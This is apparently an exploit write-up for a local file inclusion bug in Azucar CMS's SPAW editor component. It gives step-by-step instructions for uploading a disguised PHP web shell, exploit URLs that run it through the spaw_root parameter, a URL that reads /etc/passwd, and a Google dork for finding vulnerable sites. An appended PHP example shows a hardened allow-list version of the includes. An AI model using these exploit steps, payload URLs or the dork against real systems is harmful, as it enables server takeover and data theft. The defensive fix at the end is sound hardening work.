Azucar_cms had a typical bug called LFI (local file inclusion).
The bug was in:
include $spaw_root.'config/spaw_control.config.php'; in cms_estable/lib/spaw/spaw_control.class.php
include $spaw_root.'class/util.class.php'; in cms_estable/lib/spaw/spaw_control.class.php
include $spaw_root.'class/toolbars.class.php'; in cms_estable/lib/spaw/spaw_control.class.php
include $spaw_root.'class/lang.class.php'; in cms_estable/lib/spaw/spaw_control.class.php
Let me show the trick:
1 – Rename your php-shell.txt (you need one before you start) to phpshell.php.jpg
2 – By default you have access to img_library.php to upload a file, so you can upload your phpshell.php.jpg. This is the real directory:
http://www.victim.com/lib/spaw/dialogs/img_library.php
The question is, how can I call the php-shell? Here we are:
http://www.victim.com/lib/spaw/spaw_control.class.php?spaw_root=../../imagenes_cont/articulos/phpshell.php.jpg
Another trick, to show the password file on the server:
http://www.victim.com/lib/spaw/spaw_control.class.php?spaw_root=../../../../../etc/passwd
The dork to find it on Google was:
allinurl:html/sitio/
I never verified if the new versions are patched.
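A hardened form of the four include lines listed above, as an added example that is not Azucar CMS or SPAW code: the base directory is fixed server-side and every include is checked against an allow-list, so a spaw_root value sent in the request has no effect. The names SPAW_BASE, SPAW_ALLOWED and spaw_safe_path are hypothetical, and the script is assumed to sit in lib/spaw/ next to the config/ and class/ directories.

```php
<?php
// Added example, not Azucar CMS or SPAW code. Names and layout are assumptions.

// Vulnerable pattern from the page: $spaw_root is never set by the script,
// so a request can supply it (assumed cause: register_globals enabled)
// and choose which file gets included.
//   include $spaw_root.'class/util.class.php';

// Hardened: the base directory comes from the script's own location,
// never from request data.
define('SPAW_BASE', realpath(__DIR__) . DIRECTORY_SEPARATOR);

// The only files this script may include, relative to SPAW_BASE.
const SPAW_ALLOWED = [
    'config/spaw_control.config.php',
    'class/util.class.php',
    'class/toolbars.class.php',
    'class/lang.class.php',
];

function spaw_safe_path(string $relative): string
{
    // Reject anything that is not an exact allow-list entry.
    if (!in_array($relative, SPAW_ALLOWED, true)) {
        throw new RuntimeException("include not allow-listed: $relative");
    }
    // realpath() resolves ../ sequences and symlinks and returns false
    // for a missing file; the result must still start with SPAW_BASE.
    $full = realpath(SPAW_BASE . $relative);
    if ($full === false || strncmp($full, SPAW_BASE, strlen(SPAW_BASE)) !== 0) {
        throw new RuntimeException("include escapes base directory: $relative");
    }
    return $full;
}

foreach (SPAW_ALLOWED as $file) {
    include spaw_safe_path($file);
}
```

The upload directory used by img_library.php should additionally be configured so the web server never executes PHP from it and so files are stored under server-generated names.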